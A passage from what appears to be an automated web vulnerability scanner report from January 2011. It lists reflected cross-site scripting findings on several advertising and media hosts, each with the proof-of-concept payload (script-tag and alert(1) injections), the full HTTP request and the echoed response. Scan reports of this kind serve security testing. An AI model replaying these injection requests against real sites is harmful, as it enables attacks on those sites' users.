GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=1e90e<img%20src%3da%20onerror%3dalert(1)>871ea2c5bb2&getLoader=true HTTP/1.1
Host: main.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:45:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-From-Cache: False
Cache-Control: public
Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT
ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ==
Vary: *
Content-Type: application/x-javascript
Content-Length: 12228

OggiResponse='\1\1<html xmlns="http://www.w3.org/1999/xhtml">\1<head id="PlayerHead"><title>\1    Player\1</title>\1 <style type="text/css">\1 .hand {cursor:pointer}\1 </style>\1 <!--[if
...[SNIP]...
7b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=1e90e%3Cimg%20src%3da%20onerror%3dalert(1)%3E871ea2c5bb2&getLoader=true&PlayerTemplateId=fad07670-f49f-4829-b06b-1f566c5dd03b", "oggiPlayerDiv728x600"\1                    ,\'1e90e<img src=a onerror=alert(1)>871ea2c5bb2\'\1                    ,\'true\'\1                    );\1                } \1                else {\1                 PlayerLoader.InitInNewWindow(\1                 {Context}.ContextId, \1                 "http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx?id=
...[SNIP]...

4.648. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad590"><script>alert(1)</script>9326a51b31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMad590"><script>alert(1)</script>9326a51b31a/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DMad590"><script>alert(1)</script>9326a51b31a/DLX/904019383/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC=
...[SNIP]...

4.649. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5b4"><script>alert(1)</script>109944f53ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX9e5b4"><script>alert(1)</script>109944f53ee/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:00:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX9e5b4"><script>alert(1)</script>109944f53ee/443123410/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC=
...[SNIP]...

4.650. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6adea"><script>alert(1)</script>15e3466ad2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x966adea"><script>alert(1)</script>15e3466ad2a HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:00:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/2057134891/x966adea"><script>alert(1)</script>15e3466ad2a/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC
...[SNIP]...

4.651. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
Set-Cookie: spvdr=vd=a7e3d806-3337-4a1b-9339-464061ff6408&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 19093
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.652. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mx.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: spvdr=vd=79ce1b5f-ccb1-46f8-b915-4f1fe4dd4ae4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 18918
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||601d8"><a>9322a6cdc6e~1');return false;">
...[SNIP]...

4.653. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfb3"><script>alert(1)</script>3d6205c4976 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediabcfb3"><script>alert(1)</script>3d6205c4976/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:42 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediabcfb3"><script>alert(1)</script>3d6205c4976/Retarget_Secure/1463364920/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.654. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821d4"><script>alert(1)</script>35018ed4335 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure821d4"><script>alert(1)</script>35018ed4335/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:51 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure821d4"><script>alert(1)</script>35018ed4335/L18/1378154155/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1378154155" TARGET=_blank>

4.655. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8767b"><script>alert(1)</script>739eb1cf5ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom38767b"><script>alert(1)</script>739eb1cf5ec?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/414116622/Bottom38767b"><script>alert(1)</script>739eb1cf5ec/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.656. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64be6"-alert(1)-"dc3b028ab21 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=10115500001000051100164be6"-alert(1)-"dc3b028ab21 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|R10M5V|R10M5b|R10M5d|R10M5l|R10M5x|R10M62|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:41 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "10115500001000051100164be6"-alert(1)-"dc3b028ab21";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.657. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b702d"><script>alert(1)</script>58724ec2a5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediab702d"><script>alert(1)</script>58724ec2a5d/Retarget_Secure/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:08 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediab702d"><script>alert(1)</script>58724ec2a5d/Retarget_Secure/1249302909/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.658. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f2d"><script>alert(1)</script>d7bc9b80311 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure27f2d"><script>alert(1)</script>d7bc9b80311/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
